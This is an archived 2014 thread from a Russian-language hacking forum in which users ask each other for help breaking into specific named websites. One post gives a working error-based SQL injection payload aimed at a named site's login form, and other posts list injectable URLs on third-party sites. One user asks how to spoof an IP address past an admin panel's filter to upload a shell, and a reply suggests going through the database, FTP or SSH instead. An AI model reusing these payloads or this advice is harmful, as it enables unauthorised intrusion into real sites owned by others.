ANTICHAT — форум по информационной безопасности, OSINT и технологиям
ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию.
Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club,
и теперь снова доступен на новом адресе —
forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
 |
|
16.03.2014, 00:32
|
|
Guest
Сообщений: n/a
Провел на форуме:
23349
Репутация:
45
|
|
Сообщение от sav77
sav77 said:
Помогите раскрутить:
Код:
Code:
cafe.funizen[antigoogle]com/sub/customer/news.html?keyword=&ktype=&pageID=%5c
или
cafe.funizen[antigoogle]com/sub/customer/improvement_view.html?board_seq=\
POST
http://cafe.funizen.com/sub/member/login_ok.html
Код:
Code:
m_id=%5c'or(select 1 from(select max(rand(0))from(information_schema.tables)group by concat(user(),version(),hex(rand(0))))aa)-- w&m_pwd=qwrqw
|
|
|
|
17.03.2014, 19:28
|
|
Guest
Сообщений: n/a
Провел на форуме:
344922
Репутация:
75
|
|
есть форум phpbb 2, Восстановить БД - неработает, стили тоже, как еще можно залится?
|
|
|
|
19.03.2014, 22:52
|
|
Guest
Сообщений: n/a
Провел на форуме:
0
Репутация:
10
|
|
Сообщение от qaz
qaz said:
есть форум phpbb 2, Восстановить БД - неработает, стили тоже, как еще можно залится?
А если БД в ручном режиме залить по частям.
|
|
|
|
20.03.2014, 09:08
|
|
Guest
Сообщений: n/a
Провел на форуме:
5323
Репутация:
0
|
|
Помогите доковырять
http://forum-auto.ru/news.php?part=car&page_normal=2'
|
|
|
|
20.03.2014, 11:02
|
|
Guest
Сообщений: n/a
Провел на форуме:
132418
Репутация:
652
|
|
Сообщение от AHTNkiller
AHTNkiller said:
Помогите доковырять
http://forum-auto.ru/news.php?part=car&page_normal=2'
Инъекция в limit + присутствует в запросе order by = "доковырять" не получится
|
|
|
|
23.03.2014, 02:30
|
|
Guest
Сообщений: n/a
Провел на форуме:
8956
Репутация:
0
|
|
Код:
Code:
http://www.demotywuje.pl/uzytkownik/Katri/strona/'17/
|
|
|
|
26.03.2014, 13:37
|
|
Guest
Сообщений: n/a
Провел на форуме:
15532
Репутация:
4
|
|
Такой вопрос - на админке сайта стоит фильтр по айпи, через .htaccess и в РНР коде. Прогуглив вопрос о попытках подмены айпи, народ как правило говорил, что айпи поменять конечно можно, но тогда и сервер будет слать ответ на поддельный айпи. Так вот, вопрос в том, возможно ли при таком раскладе, подменив айпи на подходящий, в одностороннем порядке отправить запрос на аплоад файла? Т.е. мне вобщем-то не нужен ответ от сервера, если он просто молча зальет к себе шелл, благо доступ к залитому файлу ничем не будет ограничен.
Такой вариант возможен? Или из-за процедуры инициализации соединения, механики аплоада или чего-то подобного это нереально?
|
|
|
|
26.03.2014, 15:58
|
|
Guest
Сообщений: n/a
Провел на форуме:
23349
Репутация:
45
|
|
Сообщение от Rextor
Rextor said:
Такой вопрос - на админке сайта стоит фильтр по айпи, через .htaccess и в РНР коде. Прогуглив вопрос о попытках подмены айпи, народ как правило говорил, что айпи поменять конечно можно, но тогда и сервер будет слать ответ на поддельный айпи. Так вот, вопрос в том, возможно ли при таком раскладе, подменив айпи на подходящий, в одностороннем порядке отправить запрос на аплоад файла? Т.е. мне вобщем-то не нужен ответ от сервера, если он просто молча зальет к себе шелл, благо доступ к залитому файлу ничем не будет ограничен.
Такой вариант возможен? Или из-за процедуры инициализации соединения, механики аплоада или чего-то подобного это нереально?
При установке соединения с сервером, можно указать абсолютно любой ип, хоть пентагона или гугла, для этого в tcp пакете отведены определенные байты для указания ип источника, дабы потом ему отправить ответ, только вот после того, как вы пошлете ему пакет с флагом syn, он ответит тому, кто его якобы отправил, но тот, кто его отправлял естественно не примет этот пакет и соединение даже не установится, не говоря уже про посылку каких-либо данных по нему.)
|
|
|
|
26.03.2014, 16:09
|
|
Guest
Сообщений: n/a
Провел на форуме:
15532
Репутация:
4
|
|
Что и следовало ожидать, жаль.
|
|
|
|
26.03.2014, 17:25
|
|
Guest
Сообщений: n/a
Провел на форуме:
114076
Репутация:
54
|
|
Сообщение от Rextor
Rextor said:
Такой вопрос - на админке сайта стоит фильтр по айпи, через .htaccess и в РНР коде. Прогуглив вопрос о попытках подмены айпи, народ как правило говорил, что айпи поменять конечно можно, но тогда и сервер будет слать ответ на поддельный айпи. Так вот, вопрос в том, возможно ли при таком раскладе, подменив айпи на подходящий, в одностороннем порядке отправить запрос на аплоад файла? Т.е. мне вобщем-то не нужен ответ от сервера, если он просто молча зальет к себе шелл, благо доступ к залитому файлу ничем не будет ограничен.
Такой вариант возможен? Или из-за процедуры инициализации соединения, механики аплоада или чего-то подобного это нереально?
Не установится соединение. В широком смысле, на больших дистанциях спуфинг в tcp крайней сложно реализуем. Попробуйте зайти с другой стороны, субд, фтп, ссх и прочее.
|
|
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Похожие темы
Линейный вид
